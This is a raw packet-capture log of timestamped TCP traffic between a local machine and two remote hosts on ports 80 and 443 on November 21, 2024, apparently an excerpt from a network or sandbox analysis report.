                                                                                                                                                                      Nov 21, 2024 06:23:39.397499084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.397804976 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.398497105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.398598909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.398643017 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.399610043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.399772882 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.399821043 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.400669098 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.400824070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.400868893 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.401813030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.401873112 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.401928902 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.402825117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.402990103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.403120995 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.403897047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.404015064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.404135942 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.405004025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.405164957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.405210018 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.406075954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.406198025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.406240940 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.407151937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.407231092 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.407275915 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.408245087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.408399105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.408443928 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.409312010 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.409424067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.410424948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.410476923 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.410535097 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.410581112 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.411484003 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.411747932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.411797047 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.412570000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.412736893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.412785053 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.413626909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.413781881 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.413917065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.414717913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.414841890 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.414897919 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.415836096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.415848970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.415899038 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.416927099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.416943073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.416991949 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.418032885 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.418046951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.418087006 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.419096947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.419159889 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.419334888 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.420224905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.420267105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.420465946 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.421247959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.421272039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.421363115 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.422333956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.462220907 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.541353941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.541517973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.541898966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.541954041 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.541958094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.541999102 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.542975903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.543148041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.543428898 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.544147015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.544377089 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.544691086 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.545135021 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.545255899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.545311928 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.546206951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.546330929 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.546377897 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.547287941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.547367096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.547519922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.564997911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.565156937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.565211058 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.565536976 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.565792084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.565857887 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.565970898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.566880941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.567019939 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.567071915 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.568001032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.568043947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.568161011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.568994999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.569185019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.569792032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.570133924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.570146084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.570175886 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.571165085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.571221113 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.571407080 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.572261095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.572318077 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.572391987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.573340893 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.573422909 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.573594093 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.574436903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.574490070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.574531078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.575520039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.575683117 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.575895071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.576594114 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.576740980 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.577116966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.577676058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.577796936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.577842951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.578773022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.578830957 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.579325914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.579854012 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.579901934 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.579962015 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.580924034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.581090927 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.581136942 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.582040071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.582091093 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.582102060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.583086967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.583301067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.583342075 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.584182024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.584264994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.584347963 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.585259914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.585386992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.585437059 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.586359978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.586443901 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.586493969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.587471962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.587591887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.587652922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.588536978 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.588592052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.588643074 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.589621067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.589679956 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.590075970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.590656042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.590702057 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.590773106 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.591784000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.591839075 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.591859102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.592827082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.592922926 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.593281031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.593926907 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.594069958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.594104052 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.595038891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.595052958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.595089912 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.596149921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.596163988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.596194029 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.597255945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.597268105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.597306013 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.598304987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.598316908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.598352909 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.599390984 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.599407911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.599451065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.600461006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.600500107 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.600589991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.601550102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.601566076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.601604939 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.602607965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.602653027 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.602668047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.603684902 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.603722095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.603746891 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.604743958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.604763031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.604787111 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.605890036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.605901003 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.605937004 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.606925011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.606973886 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.607110023 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.608032942 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.608159065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.608194113 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.609091997 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.609373093 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.609426975 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.610173941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.610215902 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.610361099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.611264944 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.611679077 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.611721992 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.612370014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.612426996 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.612796068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.613425016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.613481998 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.613814116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.614536047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.614789963 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.614856005 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.614856005 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.614907980 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.615123034 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.615144968 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.615156889 CET49765443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.615164995 CET4434976513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.619337082 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.619376898 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.619829893 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.619957924 CET49770443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.619966984 CET4434977013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.651652098 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.652287006 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.652299881 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.652769089 CET49768443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.652779102 CET4434976813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.691755056 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.718822002 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.718916893 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.719022036 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.719280958 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.719300985 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.719347000 CET49766443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.719355106 CET4434976613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.722734928 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.722774029 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.722841978 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.723151922 CET49771443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.723165989 CET4434977113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.745573044 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.745657921 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.745870113 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.785240889 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.785290956 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.785310030 CET49767443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.785320044 CET4434976713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.801201105 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.801253080 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.801628113 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.801871061 CET49772443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:39.801886082 CET4434977213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.811378956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.811937094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.811954975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.811978102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.812025070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.812079906 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.812966108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.814004898 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.814068079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.814079046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.814121008 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.815131903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.815829992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.816220999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.816270113 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.816579103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.816621065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.817369938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.817380905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.817500114 CET4976280192.168.2.6185.215.113.16
